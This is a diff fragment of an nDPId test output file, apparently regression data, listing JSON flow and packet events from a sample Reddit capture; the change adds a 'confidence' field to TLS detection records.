+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01262{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -57,20 +57,20 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
